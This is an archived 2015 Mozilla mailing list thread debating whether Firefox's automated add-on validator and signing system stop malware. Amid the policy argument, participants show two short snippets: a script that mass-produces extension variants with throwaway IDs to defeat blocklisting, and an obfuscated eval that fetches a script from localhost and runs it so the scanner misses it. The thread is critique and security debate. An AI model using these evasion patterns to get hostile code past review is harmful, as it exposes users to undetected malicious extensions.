
AMO Validator Bypass: a call for sanity


Dan Stillman

Nov 24, 2015, 10:07:56 PM
to mozilla-addons-...@lists.mozilla.org, amc...@mozilla.com, k...@mozilla.com
So Jorge just decided that the best way to respond to my trivial
validator-bypassing proof-of-concept [1] — a skeleton extension on
GitHub with three tiny examples of unblockable code patterns, hard-coded
to localhost — was to add it to the Firefox blocklist:

https://bugzilla.mozilla.org/show_bug.cgi?id=1227605

Yes, that’s right — you can no longer distribute an extension with the
id of amo-valida...@example.com. But you can still do everything
that it does and have your extension automatically signed, and there’s
no way that the current system can prevent that.

Can someone please step in and restore some sanity here?

In my post I provide concrete suggestions for meaningfully improving the
current system from the current useless/dangerous one. I'm happy to
discuss them further. But this is well past being an embarrassment to
Mozilla.

FYI, my post has been on Hacker News and is currently on the front pages
of r/linux and r/technology on Reddit, and it's been viewed thousands of
times today. This is now happening in public.

[1]
http://danstillman.com/2015/11/23/firefox-extension-scanning-is-security-theater

Emiliano Heyns

Nov 25, 2015, 5:37:24 AM
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> So Jorge just decided that the best way to respond to my trivial
> validator-bypassing proof-of-concept [1] -- a skeleton extension on
> GitHub with three tiny examples of unblockable code patterns, hard-coded
> to localhost -- was to add it to the Firefox blocklist:
>
> https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
>
> Yes, that's right -- you can no longer distribute an extension with the
> id of amo-valida...@example.com. But you can still do everything
> that it does and have your extension automatically signed, and there's
> no way that the current system can prevent that.

What's the point in that? No one is going to install this (there isn't even an XPI to install), and this block just blocks that one specific, freely-choosable ID (right?). A three-line script could pump out a thousand variants per minute, all with unique IDs. Am I missing something here?
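
To make that concrete, here's a minimal sketch of such a churn script in Node. The install.rdf.tmpl file and the __ID__ placeholder are made up for illustration, not taken from any real add-on:

    // Hypothetical sketch: stamp out extension skeletons, each with a unique ID.
    var fs = require('fs');
    var crypto = require('crypto');

    var template = fs.readFileSync('install.rdf.tmpl', 'utf8');

    for (var i = 0; i < 1000; i++) {
      // a throwaway, freely chosen ID per variant
      var id = crypto.randomBytes(16).toString('hex') + '@example.com';
      fs.mkdirSync('variants/' + id, { recursive: true });
      fs.writeFileSync('variants/' + id + '/install.rdf',
                       template.replace('__ID__', id));
    }

Blocking any one of those IDs after the fact achieves nothing.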

Tyler Downer

Nov 25, 2015, 9:04:07 AM
to Emiliano Heyns, mozilla-addons-...@lists.mozilla.org
So, I haven't chimed in on this conversation yet, mainly because I'm far
too busy with other work, and this mailing list has gone rather circular at
times, but I do feel like we should clear the air here.

As far as I know, there was never any claim that the extension validator
would be a foolproof way to keep all malicious add-ons out. This would be
an impossible task, one that entire companies are dedicated to doing and
can't even succeed 100% of the time (See anti-virus and anti-malware
scanners). The validator is there to check for *common* issues that we see
in many add-ons, to try and catch some of the low hanging fruit. We will
also work on hardening and improving it as Firefox and the malware scene
changes (https://bugzilla.mozilla.org/show_bug.cgi?id=1227867). Mozilla is
not an anti-malware company however, nor are we trying to be.

Second, I don't believe we have ever denied "that signing gives you
enforcement of add-on ids, a record of deployed code, and a mechanism for
combating malicious side-loaded extensions, which were the primary target
of this scheme to begin with." as you say. The add-on validator and the
add-on signing system work in conjunction to provide a safer ecosystem.
Yes, add-ons will slip through the validator, but combined with signing, we
are providing a safer system for our users.

On Wed, Nov 25, 2015 at 3:37 AM, Emiliano Heyns <
emilian...@iris-advies.com> wrote:

> On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> > So Jorge just decided that the best way to respond to my trivial
> > validator-bypassing proof-of-concept [1] -- a skeleton extension on
> > GitHub with three tiny examples of unblockable code patterns, hard-coded
> > to localhost -- was to add it to the Firefox blocklist:
> >
> > https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
> >
> > Yes, that's right -- you can no longer distribute an extension with the
> > id of amo-valida...@example.com. But you can still do everything
> > that it does and have your extension automatically signed, and there's
> > no way that the current system can prevent that.
>
> What's the point in that? No one is going to install this (there isn't
> even an XPI to install), and this block just blocks that one specific,
> freely-choosable ID (right?). A three-liner script could pump out a
> thousand variants per minute all with unique IDs. Am I missing something
> here?



--
Tyler Downer
Project Manager, User Advocacy

Kaply Consulting

Nov 25, 2015, 10:17:30 AM
to Tyler Downer, Emiliano Heyns, mozilla-addons-...@lists.mozilla.org
If the validator causes malware developers to simply get more creative with
their Javascript, how does that make users safer?

Especially if these add-ons are signed automatically?

It's trivial to bypass the validator and have your add-on signed.

Even the author of the new validator admits that -
https://blog.mozilla.org/addons/2015/11/25/a-new-firefox-add-ons-validator/comment-page-1/#comment-220442
.

It's a linter, not a validator.

If we required add-on developers to obtain their own certificates, it would
be more secure because then there would at least be an identity piece. As
it stands, anyone can use any email address to sign up for AMO.

Mike




On Wed, Nov 25, 2015 at 8:04 AM, Tyler Downer <tdo...@mozilla.com> wrote:

> So, I haven't chimed in on this conversation yet, mainly because I'm far
> too busy with other work, and this mailing list has gone rather circular at
> times, but I do feel like we should clear the air here.
>
> As far as I know, there was never any claim that the extension validator
> would be a foolproof way to keep all malicious add-ons out. This would be
> an impossible task, one that entire companies are dedicated to doing and
> can't even succeed 100% of the time (See anti-virus and anti-malware
> scanners). The validator is there to check for *common* issues that we see
> in many add-ons, to try and catch some of the low hanging fruit. We will
> also work on hardening and improving it as Firefox and the malware scene
> changes (https://bugzilla.mozilla.org/show_bug.cgi?id=1227867). Mozilla is
> not an anti-malware company however, nor are we trying to be.
>
> Second, I don't believe we have ever denied "that signing gives you
> enforcement of add-on ids, a record of deployed code, and a mechanism for
> combating malicious side-loaded extensions, which were the primary target
> of this scheme to begin with." as you say. The add-on validator and the
> add-on signing system work in conjunction to provide a safer ecosystem.
> Yes, add-ons will slip through the validator, but combined with signing, we
> are providing a safer system for our users.
>
> On Wed, Nov 25, 2015 at 3:37 AM, Emiliano Heyns <
> emilian...@iris-advies.com> wrote:
>
> > On Wednesday, November 25, 2015 at 4:07:56 AM UTC+1, Dan Stillman wrote:
> > > So Jorge just decided that the best way to respond to my trivial
> > > validator-bypassing proof-of-concept [1] -- a skeleton extension on
> > > GitHub with three tiny examples of unblockable code patterns, hard-coded
> > > to localhost -- was to add it to the Firefox blocklist:
> > >
> > > https://bugzilla.mozilla.org/show_bug.cgi?id=1227605
> > >
> > > Yes, that's right -- you can no longer distribute an extension with the
> > > id of amo-valida...@example.com. But you can still do everything
> > > that it does and have your extension automatically signed, and there's
> > > no way that the current system can prevent that.
> >

Emiliano Heyns

Nov 25, 2015, 10:46:47 AM
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 4:17:30 PM UTC+1, Kaply Consulting wrote:

> If the validator causes malware developers to simply get more creative with
> their Javascript, how does that make users safer?

Playing devil's advocate here, but forcing malware devs to get more creative *does* make users safer. It means you need more skillful people, and it would take more time.

The kind of creativity that Dan shows in his extension, however (sorry Dan), isn't exactly rockstar-developer stuff. It's something anyone with more than a passing knowledge of JavaScript would have found immediately, the first time the validator nuh-uh'd it.

> Especially if these add-ons are signed automatically?
>
> It's trivial to bypass the validator and have your add-on signed.

And therein lies the rub. Anyone could use these methods to get absolutely anything auto-signed -- including Zotero. Zotero is unlikely to do this because their extension ID would immediately be banned, and that would make upgrades and stuff impossible. So they're not going to want to do that.

If you don't mind throwaway IDs/email addresses however (like, e.g. malware authors), you don't have to care about one specific account/extension ID being banned. You can just churn out new ones and have those autosigned.

Dan mentioned putting the initial version (for a given extension ID) through manual review, and whitelisting after that. That alone should stop ID churning dead in its tracks. So here the signature, combined with process, *would* actually help. It doesn't fix the case where (as has so often been hinted, but never shown) an existing extension goes rogue, no. But if you wanted to go rogue, you'd spend (if your extension is big and complicated) a few days on passing automated validation. If you want to go rogue, you can already do that, and Mozilla will even add a nice "seen by mozilla!" sign on it to put users' minds at rest.

> If we required add-on developers to obtain their own certificates, it would
> be more secure because then there would at least be an identity piece. As
> it stands, anyone can use any email address to sign up for AMO.

Or something like [this](http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity/), [this](http://convergence.io/) or [this](http://tack.io/). Forget about the goofy handle; Moxie Marlinspike knows his stuff when it comes to threat models and security.

Dan Stillman

Nov 25, 2015, 1:42:55 PM
to mozilla-addons-...@lists.mozilla.org
Just in case you thought this couldn't get more absurd, Tyler Downer is
now attempting to discredit me on Reddit [1] by telling people that
Zotero submits "unnecessary code changes that slow up review times" (a
claim that I've never even seen made before) and that I didn't give the
full story (despite my linking to and giving context for the exact same
thread he links to in my post).

You guys are out of control.

[1]
https://www.reddit.com/r/firefox/comments/3u8cbe/automated_scanning_of_firefox_extensions_is/cxcrsg3

Emiliano Heyns

Nov 25, 2015, 4:09:15 PM
to mozilla-addons-...@lists.mozilla.org
So the claim is now that Zotero is adding code that has no other purpose than to spite the AMO reviewers?

Wow. That is a whole new level of insanity.

Mike Connor

Nov 25, 2015, 4:22:03 PM
to Dan Stillman, mozilla-addons-...@lists.mozilla.org
Hi Dan,

I think people on both sides have unnecessarily escalated this situation.
I'd also like to restore some sanity, and to that end I'd like to clarify
some points that I suspect have been confused or missed entirely:

1) Mozilla's position is not now, nor has it ever been, that the validator
represents a panacea for malware. It's a useful tool for catching common
bad patterns, and there's tons of room for improvement, but it'd be absurd
to claim 100% protection is possible.

2) One of the biggest wins from having all add-ons signed by Mozilla is
that we can effectively block bad add-ons (including variants submitted
from different accounts), which can't be said for the current system. This
is because add-ons can't self-modify or masquerade as common add-ons. (Or,
perhaps worse, be malicious forks of otherwise legitimate add-ons.) I
don't think it makes sense to completely ignore this factor in assessing
the overall security impact of signing.

3) It seems like a significant misrepresentation to claim that anyone's
said Zotero "will either turn rogue or become an attack vector" if you are
whitelisted. It's an extremely unlikely situation, as I've tried to take
pains to note. That said, humans make errors in judgement, and we'd be
foolish to ignore the possibility in drafting an official whitelisting
policy. My primary goal on whitelisting has been to ensure we have a fair
policy for all affected developers that incorporates clear resolutions to
all possible situations.

Big picture, we're not going to find common ground if we aren't even on the
same page about what and why we're doing things.

-- Mike


On Wed, Nov 25, 2015 at 1:42 PM, Dan Stillman <dsti...@zotero.org> wrote:

> Just in case you thought this couldn't get more absurd, Tyler Downer is
> now attempting to discredit me on Reddit [1] by telling people that Zotero
> submits "unnecessary code changes that slow up review times" (a claim that
> I've never even seen made before) and that I didn't give the full story
> (despite my linking to and giving context for the exact same thread he
> links to in my post).
>
> You guys are out of control.
>
> [1]
> https://www.reddit.com/r/firefox/comments/3u8cbe/automated_scanning_of_firefox_extensions_is/cxcrsg3
>

Dan Stillman

Nov 25, 2015, 5:19:46 PM
to mozilla-addons-...@lists.mozilla.org
On 11/25/15 4:21 PM, Mike Connor wrote:
> 1) Mozilla's position is not now, nor has it ever been, that the
> validator represents a panacea for malware. It's a useful tool for
> catching common bad patterns, and there's tons of room for
> improvement, but it'd be absurd to claim 100% protection is possible.

Let's please not rewrite history.

As I note in my post, it was Jorge who said the scanner could "block the
majority of malware" when I first raised these concerns 9 months ago.
You've repeatedly said throughout this discussion that automated
scanning provides meaningful protections against malware, and that
whitelisted extensions are therefore inherently more dangerous.

Both of those claims are false in light of the code examples I've
provided. If you don't believe me, believe your colleagues:

"There is simply no way to detect malicious code like this in a dynamic
language like JS through static analysis of the source code." [1]

There is a trivial path to getting eval() through the automated scanner
for anyone with a basic knowledge of JavaScript. That can't be
prevented. All other policy decisions need to stem from that reality,
and it's a reality that the people defending this system either don't
understand or are still refusing to acknowledge because they don't want
to admit that they've been defending a broken system.
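
To be concrete about what "trivial" means, here is an illustrative
sketch in the spirit of the PoC. This is not the PoC's actual code;
the URL and variable names are invented, and it's hard-coded to
localhost like the examples on GitHub:

    // A scanner looking for the literal string "eval(" sees nothing here.
    var key = 'ev' + 'al';                // 'eval' never appears as a literal
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://localhost:8080/payload.js', false);
    xhr.send();
    window[key](xhr.responseText);        // runs whatever localhost returned

That's the entire class of problem: static analysis can't know what
that string will hold at runtime.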

> 2) One of the biggest wins from having all add-ons signed by Mozilla
> is that we can effectively block bad add-ons (including variants
> submitted from different accounts), which can't be said for the
> current system. This is because add-ons can't self-modify or
> masquerade as common add-ons. (Or, perhaps worse, be malicious forks
> of otherwise legitimate add-ons.) I don't think it makes sense to
> completely ignore this factor in assessing the overall security impact
> of signing.

I'm not sure whom you're addressing with this. I defend code signing in
my post, and give concrete suggestions for building off of the actual
protections that code signing itself provides. But as currently
implemented, the system only impedes legitimate developers, while
providing no meaningful protections against malware and in fact
endangering users by providing a false sense of security.

> 3) It seems like a significant misrepresentation to claim that
> anyone's said Zotero "will either turn rogue or become an attack
> vector" if you are whitelisted. It's an extremely unlikely situation,
> as I've tried to take pains to note. That said, humans make errors in
> judgement, and we'd be foolish to ignore the possibility in drafting
> an official whitelisting policy. My primary goal on whitelisting has
> been to ensure we have a fair policy for all affected developers that
> incorporates clear resolutions to all possible situations.

It's been repeatedly suggested on this list that those were significant
possibilities.

But you're still not understanding. If Zotero or any other extension is
compromised, the attacker will simply submit an extension that bypasses
the automated scanner, which by definition, and as your own colleagues
attest, cannot be prevented. The only change with whitelisting is that
behaviors that no attempt was made to hide would be allowed through.
There are no additional protections.

> Big picture, we're not going to find common ground if we aren't even
> on the same page about what and why we're doing things.

Right, and my point is that the people defending the system don't
understand the technical issues here well enough to do so.

Fortunately this is being followed up in other channels, so I don't
think we really need to spend more time on it here.

- Dan


[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1227867

tyar...@gmail.com

Nov 25, 2015, 5:22:12 PM
to mozilla-addons-...@lists.mozilla.org
1)
> It's a useful tool for catching common bad patterns, and there's tons of
> room for improvement, but it'd be absurd to claim 100% protection is possible.

Dan has not made any claim such as this. His claim is that it should not be trivial to bypass the validator. Does this imply "100% protection" to you?

You won't find common ground by positing strawmen.

If it's a useful tool to catch bad patterns and it's trivial to use different bad patterns that won't be caught then it's not a useful tool.


2) Dan already knows this. From his advice:

> Stop pretending you can meaningfully combat malware via automated scanning. Accept that signing gives you enforcement of add-on ids, a record of deployed code, and a mechanism for combating malicious side-loaded extensions, which were the primary target of this scheme to begin with. These are all meaningful improvements from the pre-signing era.

You won't find common ground by restating established points as if they're new revelations.

tyar...@gmail.com

Nov 25, 2015, 5:22:47 PM
to mozilla-addons-...@lists.mozilla.org
On Wednesday, November 25, 2015 at 2:22:03 PM UTC-7, Mike Connor wrote:
Then why not ask for evidence that this has been suggested to Dan by those from Mozilla instead of implying that he is purposely or recklessly misrepresenting them?

You won't find common ground attacking Dan's credibility without basis.

Mike Connor

Nov 25, 2015, 9:59:21 PM
to Dan Stillman, addons-user...@lists.mozilla.org
On Wed, Nov 25, 2015 at 5:18 PM, Dan Stillman <dsti...@zotero.org> wrote:

> On 11/25/15 4:21 PM, Mike Connor wrote:
>
>> 1) Mozilla's position is not now, nor has it ever been, that the
>> validator represents a panacea for malware. It's a useful tool for catching
>> common bad patterns, and there's tons of room for improvement, but it'd be
>> absurd to claim 100% protection is possible.
>>
>
> Let's please not rewrite history.
>
> As I note in my post, it was Jorge who said the scanner could "block the
> majority of malware" when I first raised these concerns 9 months ago.


I think it's a substantial stretch to take that statement, without context,
and interpret it into scanning being a panacea or 100% reliable.


> You've repeatedly said throughout this discussion that automated scanning
> provides meaningful protections against malware, and that whitelisted
> extensions are therefore inherently more dangerous.
>

My assumption has always been that we'd need to do something beyond static
analysis to stop the smart bad guys. If I've failed to communicate that
assumption, my bad. (We've had some interesting conversations with a
potential partner who's already doing runtime analysis of add-ons, but the
tech is proprietary, so that's been slow.) That said, there's a lot of
lazy, unskilled "hackers" out there.

And yes, in the magical future world where automated scanning catches bad
actors a whitelisted add-on would be an attractive target. I don't think
that's a bad assumption.

>> 2) One of the biggest wins from having all add-ons signed by Mozilla is
>> that we can effectively block bad add-ons (including variants submitted
>> from different accounts), which can't be said for the current system. This
>> is because add-ons can't self-modify or masquerade as common add-ons. (Or,
>> perhaps worse, be malicious forks of otherwise legitimate add-ons.) I
>> don't think it makes sense to completely ignore this factor in assessing
>> the overall security impact of signing.
>>
>
> I'm not sure whom you're addressing with this.



> I defend code signing in my post, and give concrete suggestions for
> building off of the actual protections that code signing itself provides.
> But as currently implemented, the system only impedes legitimate
> developers, while providing no meaningful protections against malware and
> in fact endangering users by providing a false sense of security.


Read your own point one. That's more or less the conversation we had over a
year ago, before we announced any of this publicly. That people believe we
can get an additional win from better automatic testing is entirely
orthogonal to whether the signing approach has other wins for combating
malware.

To assert that the system has no value (money quote: "only to end up with a
system that is utterly incapable of actually combating malware.") is where
this point comes in. There's real, effective wins from the current system,
and you're dismissing them entirely over what I assumed to be an additional
opportunity to raise the bar. That's a huge disconnect.

>> 3) It seems like a significant misrepresentation to claim that anyone's
>> said Zotero "will either turn rogue or become an attack vector" if you are
>> whitelisted. It's an extremely unlikely situation, as I've tried to take
>> pains to note. That said, humans make errors in judgement, and we'd be
>> foolish to ignore the possibility in drafting an official whitelisting
>> policy. My primary goal on whitelisting has been to ensure we have a fair
>> policy for all affected developers that incorporates clear resolutions to
>> all possible situations.
>>
>
> It's been repeatedly suggested on this list that those were significant
> possibilities.
>

Link/quote? Again, I've taken great care to note that however unlikely we
may believe something to be, it's something that a strong policy will cover
as a possibility. That's it, at least for my part, but maybe I missed
something absurd someone else said.

I don't know how many times I need to say that for you to believe me. I'd
sincerely like to collaborate, but I do react badly to an assumption of bad
faith.


> But you're still not understanding. If Zotero or any other extension is
> compromised, the attacker will simply submit an extension that bypasses the
> automated scanner, which by definition, and as your own colleagues attest,
> cannot be prevented. The only change with whitelisting is that behaviors
> that no attempt was made to hide would be allowed through. There are no
> additional protections.


If we intend to rely solely on static analysis, yes. Again, my assumption
was that scanning was an initial step, and we would need to do much more
over time. I thought that was obvious enough that I didn't need to expand
the definition every time. Sadly not the case.

>> Big picture, we're not going to find common ground if we aren't even on the
>> same page about what and why we're doing things.
>>
>
> Right, and my point is that the people defending the system don't
> understand the technical issues here well enough to do so.


I'm not sure if that's directed at me, but oh well.

-- Mike

Dan Stillman

Nov 26, 2015, 1:25:47 AM
to addons-user...@lists.mozilla.org
On 11/25/15 9:59 PM, Mike Connor wrote:
> On Wed, Nov 25, 2015 at 5:18 PM, Dan Stillman <dsti...@zotero.org
> <mailto:dsti...@zotero.org>> wrote:
>
> On 11/25/15 4:21 PM, Mike Connor wrote:
>
> 1) Mozilla's position is not now, nor has it ever been, that
> the validator represents a panacea for malware. It's a useful
> tool for catching common bad patterns, and there's tons of
> room for improvement, but it'd be absurd to claim 100%
> protection is possible.
>
>
> Let's please not rewrite history.
>
> As I note in my post, it was Jorge who said the scanner could
> "block the majority of malware" when I first raised these concerns
> 9 months ago.
>
>
> I think it's a substantial stretch to take that statement, without
> context, and interpret it into scanning being a panacea or 100% reliable.

Huh? "Panacea" and "100% protection" were your words. Here's what Jorge
said, when I asked about this sort of trivial string concatenation: "We
believe we can refine our detection system so we can block the majority
of malware, but it will never be perfect." [1]

That has been his underlying assumption throughout this entire process,
and it's simply not true. You can't block even the most trivial efforts
at obfuscation. Based on his blocklisting of the PoC id and his comments
on the hardening bug [2], it's not clear to me that Jorge understands
that even now. Which is OK — I don't mean that as a personal attack.
He's been operating under bad info. But it calls into question most of
the policy arguments he's made on this subject in the last year. You
can't make good policy without understanding just how little the
automated scanner can actually do.

Even the developer of the validator, asking a month ago whether
combating this sort of trivial obfuscation was possible (it's not, as he
was told), said, "Without it the validator remains more an
advisory/helpful tool than something we could use to automate security
validation." [3]

> You've repeatedly said throughout this discussion that automated
> scanning provides meaningful protections against malware, and that
> whitelisted extensions are therefore inherently more dangerous.
>
>
> My assumption has always been that we'd need to do something beyond
> static analysis to stop the smart bad guys. If I've failed to
> communicate that assumption, my bad.

The smart bad guys who can concatenate two strings?

Anyhow, if you've shared that assumption, I have not seen it. Certainly
nobody else has been talking about that. We've been talking about the
automated scanner and manual review.

> (We've had some interesting conversations with a potential partner
> who's already doing runtime analysis of add-ons, but the tech is
> proprietary, so that's been slow.)

Runtime analysis...which has no bearing on a discussion about an
automated scanner and manual review?

> That said, there's a lot of lazy, unskilled "hackers" out there.

Right, so again, you're advocating putting in place a system that's
massively disruptive to legitimate developers in order to combat
"hackers" who can't concatenate two strings, or read an HTTP header and
issue an XHR. And since you're saying it's potentially grounds for
denying whitelist status to an extension like Zotero, those are also the
people who would have purchased Zotero from George Mason University,
taken over Zotero development, compromised the Zotero servers,
compromised our VCS, snuck code past our review process, or any of the
other nightmare scenarios that have been offered.

> And yes, in the magical future world where automated scanning catches
> bad actors a whitelisted add-on would be an attractive target. I
> don't think that's a bad assumption.

I'm sorry, are you now saying that for the last three months you've been
arguing not about the scanning system that everyone else is talking
about but a magical future system that can catch someone who doesn't
want to be manually reviewed, which no one else weighing in on my post,
including other Mozilla engineers, seems to think is possible?

> I defend code signing in my post, and give concrete suggestions
> for building off of the actual protections that code signing
> itself provides. But as currently implemented, the system only
> impedes legitimate developers, while providing no meaningful
> protections against malware and in fact endangering users by
> providing a false sense of security.
>
>
> Read your own point one. That's more or less the conversation we had
> over a year ago, before we announced any of this publicly. That
> people believe we can get an additional win from better automatic
> testing is entirely orthogonal to whether the signing approach has
> other wins for combating malware.
>
> To assert that the system has no value (money quote: "only to end up
> with a system that is utterly incapable of actually combating
> malware.") is where this point comes in. There's real, effective wins
> from the current system, and you're dismissing them entirely over what
> I assumed to be an additional opportunity to raise the bar. That's a
> huge disconnect.

Yes, it is not capable of combating malware by anyone who 1) has the
slightest bit of JS knowledge and 2) does not want to be detected. Jorge
wasn't aware of that, but hopefully now is, after several Mozilla
engineers have explained it. The developer of the validator acknowledges
it, after Mozilla engineers confirmed it to him (and he's now calling it
a "linter" rather than a "validator"). You seem to still be disputing it.

I'm glad we agree on my point 1. It's point 2 — the parts of the system
that block legitimate developers from releasing extensions without
manual review — that this entire discussion has been about.

You've referred repeatedly to the need to balance user safety and
developer freedom. My PoC demonstrates that the scanner provides
essentially no user safety, because anyone who wants to can bypass it. I
hope by now everyone is clear on the costs it imposes on developers and
their users. You can keep arguing that those costs are worth it, but it
doesn't seem like many people are going to agree with you in light of
what I've shown.

In point 2 I suggest alterations that could be made to the new plan to
both meaningfully increase user safety and avoid the serious drawbacks
of the current plan in light of its sheer ineffectiveness.

> 3) It seems like a significant misrepresentation to claim that
> anyone's said Zotero "will either turn rogue or become an
> attack vector" if you are whitelisted. It's an extremely
> unlikely situation, as I've tried to take pains to note. That
> said, humans make errors in judgement, and we'd be foolish to
> ignore the possibility in drafting an official whitelisting
> policy. My primary goal on whitelisting has been to ensure we
> have a fair policy for all affected developers that
> incorporates clear resolutions to all possible situations.
>
>
> It's been repeatedly suggested on this list that those were
> significant possibilities.
>
>
> Link/quote? Again, I've taken great care to note that however unlikely
> we may believe something to be, it's something that a strong policy
> will cover as a possibility. That's it, at least for my part, but
> maybe I missed something absurd someone else said.
>
> I don't know how many times I need to say that for you to believe me.
> I'd sincerely like to collaborate, but I do react badly to an
> assumption of bad faith.

See the "nightmare scenarios" I list above. I'm not going to go find all
the threads, but I believe you've said most or all of those, except for
sneaking-code-past-Zotero-reviewers (which was Jorge). Jorge said some
of the same things. He also said that whitelisting "leads to code
getting significantly worse over time because there's no external party
reviewing it", including, in many cases, "exploitable security holes"
[4], and you backed him up on that, ignoring the fact that Zotero has in
effect been whitelisted for the last decade without that happening.

The issue isn't that you've suggested these as possibilities. It's that,
rather than evaluating the likelihood of them in Zotero's specific case
(e.g., the likelihood of Zotero being sold for malware) or weighing our
proven history of security against the risks, you've used them as
blanket reasons to not even commit to whitelisting Zotero under any
reasonable system. And you've done so in defense of a system that
everyone can now plainly see does essentially nothing to prevent
malware, because an attacker of any extension, whitelisted or not, can
get any code they want past the validator.
>
> But you're still not understanding. If Zotero or any other
> extension is compromised, the attacker will simply submit an
> extension that bypasses the automated scanner, which by
> definition, and as your own colleagues attest, cannot be
> prevented. The only change with whitelisting is that behaviors
> that no attempt was made to hide would be allowed through. There
> are no additional protections.
>
>
> If we intend to rely solely on static analysis, yes. Again, my
> assumption was that scanning was an initial step, and we would need to
> do much more over time. I thought that was obvious enough that I
> didn't need to expand the definition every time. Sadly not the case.

I don't know what "much more" you're referring to. Everyone else has
been talking about automated scanning, which provides essentially no
protections against malicious code, as all the engineers on the
hardening bug agree [2], and fallback manual review, which causes all
the problems for developers we've been discussing. But if the entire
dialogue with you has been one big misunderstanding, that's great.

- Dan

[1]
https://groups.google.com/d/msg/mozilla.addons.user-experience/slaKs943n4c/2nUqKsV9jgAJ
[2] https://bugzilla.mozilla.org/show_bug.cgi?id=1227867
[3]
https://groups.google.com/d/topic/mozilla.dev.static-analysis/qTCBKh2bRsE/discussion
[4]
https://groups.google.com/d/msg/mozilla.addons.user-experience/3bAaITHf1Xo/-phOBbI5AwAJ

Mike Connor

Nov 26, 2015, 2:16:27 PM
to Dan Stillman, addons-user...@lists.mozilla.org
On Thu, Nov 26, 2015 at 1:25 AM, Dan Stillman <dsti...@zotero.org> wrote:

>
> Huh? "Panacea" and "100% protection" were your words. Here's what Jorge
> said, when I asked about this sort of trivial string concatentation: "We
> believe we can refine our detection system so we can block the majority of
> malware, but it will never be perfect." [1]
>

So, here's the entire disconnect: you're claiming we're actually
endangering end users, based seemingly on that statement. I think that's...
deeply broken.

To me, a claim that we're endangering users with a false sense of security
means we've made a claim to those users about more effective end user
security for this class of add-ons (including through our UI). I don't
think we've made that claim (and our UI doesn't either, last I looked).

>> (We've had some interesting conversations with a potential partner who's
>> already doing runtime analysis of add-ons, but the tech is proprietary, so
>> that's been slow.)
>>
>
> Runtime analysis...which has no bearing on a discussion about an automated
> scanner and manual review?


The goal was to integrate directly with their tech via a web service. In
more or less real time.


>> And yes, in the magical future world where automated scanning catches bad
>> actors a whitelisted add-on would be an attractive target. I don't think
>> that's a bad assumption.
>>
>
> I'm sorry, are you now saying that for the last three months you've been
> arguing not about the scanning system that everyone else is talking about
> but a magical future system that can catch someone who doesn't want to be
> manually reviewed, which no one else weighing in on my post, including
> other Mozilla engineers, seems to think is possible?


Yes, I've been operating for the last year or so under the assumption that
any meaningful automated scanning in the long term would require tech that
isn't static analysis.

(I have an unfortunate tendency toward assuming shared/equal context, and
glossing over the details. Especially on things I've known for a long
time. Aspie brain sucks.)

> Yes, it is not capable of combating malware by anyone who 1) has the
> slightest bit of JS knowledge and 2) does not want to be detected.


Signing, as you note repeatedly, gives us real tools to combat malware,
especially side-loaded malware. It's important that we distinguish the
two. However, you don't just attack the scanner, you're attacking the
entire system. [1]

> In point 2 I suggest alterations that could be made to the new plan to both
> meaningfully increase user safety and avoid the serious drawbacks of the
> current plan in light of its sheer ineffectiveness.


The roadblock of an initial review is smart, but potentially wouldn't scale
well.

>> ignoring the fact that Zotero has in effect been whitelisted for the last
>> decade without that happening.
>>
>
"It hasn't happened before, so it won't happen in the future."

> The issue isn't that you've suggested these as possibilities.


That's really not true, IMO. You've reacted aggressively and dismissively
to any statement that suggests we can't simply assume Zotero will never go
bad. It could happen. Will it happen? Almost certainly not. But it'd be
naive to not ensure the general policy has a remediation step if that
unlikely event happens.

Again, and I keep saying this: I'm not worried about Zotero in particular,
I just don't want Zotero's example to be the justification for a poorly
conceived policy. (Or worse, an arbitrary set of exceptions.) I don't
think that's an unfair position.

> I don't know what "much more" you're referring to. Everyone else has been
> talking about automated scanning, which provides essentially no
> protections against malicious code, as all the engineers on the hardening
> bug agree [2],


"Better than glorified regexps"


> and fallback manual review, which causes all the problems for developers
> we've been discussing. But if the entire dialogue with you has been one big
> misunderstanding, that's great.
>

I'd say at least 85%. :)

-- Mike

[1] "And it's just depressing that the entire Mozilla developer community
spent the last year debating extension signing and having every single
counterargument be dismissed only to end up with a system that is utterly
incapable of actually combating malware."

Dan Stillman

Nov 27, 2015, 4:19:55 AM
to addons-user...@lists.mozilla.org
On 11/26/15 2:16 PM, Mike Connor wrote:
> On Thu, Nov 26, 2015 at 1:25 AM, Dan Stillman <dsti...@zotero.org
> <mailto:dsti...@zotero.org>> wrote:
>
>
> Huh? "Panacea" and "100% protection" were your words. Here's what
> Jorge said, when I asked about this sort of trivial string
> concatentation: "We believe we can refine our detection system so
> we can block the majority of malware, but it will never be
> perfect." [1]
>
>
> So, here's the entire disconnect: you're claiming we're actually
> endangering end users, based seemingly on that statement. I think
> that's... deeply broken.
>
> To me, a claim that we're endangering users with a false sense of
> security means we've made a claim to those users about more effective
> end user security for this class of add-ons (including through our
> UI). I don't think we've made that claim (and our UI doesn't either,
> last I looked).

If you can't acknowledge that "we can block the majority of malware"
(February) and "adequate validation should filter out the majority of
malware" (yesterday) are incorrect statements made by someone not aware
of the relevant technical issues, we're not going to get anywhere.

It's good that the UI hasn't changed — I checked that before I wrote my
post. (For what it's worth, the original blog post did say "Extensions
that meet the full review standard will have a smoother and friendlier
install experience, regardless of where they’re hosted." and show a
version of a less-scary installation UI. That appears to have been
wisely dropped.) But this has been a very public change, and all parts
of it — including the scanner — have been made and repeatedly defended
in the name of combating malware, including by you. Everyone can now see
that the automated scanner is not capable of stopping anyone who does
not want to be detected.

(Also, since we agree that a record of deployed code is valuable, we
hopefully also agree that having onerous but trivially bypassable rules
could result in less code available to search through or review after
the fact.)

Anyhow, the false sense of security produced by Mozilla's statements is
the least of my concerns — that was one line in my post, and describing
it as "the entire disconnect" seems a bit off-base. As you well know, my
primary concern, and the reason for my post, is the ability of Zotero
and other legitimate developers to continue unimpeded. You have said
over and over that your goal is to balance user safety and developer
freedom. You can no longer reasonably argue that the current system
achieves that balance, because, as many thousands of people have now
seen, automated scanning provides essentially no additional security,
while manual review is extremely disruptive to legitimate developers.

> (We've had some interesting conversations with a potential
> partner who's already doing runtime analysis of add-ons, but
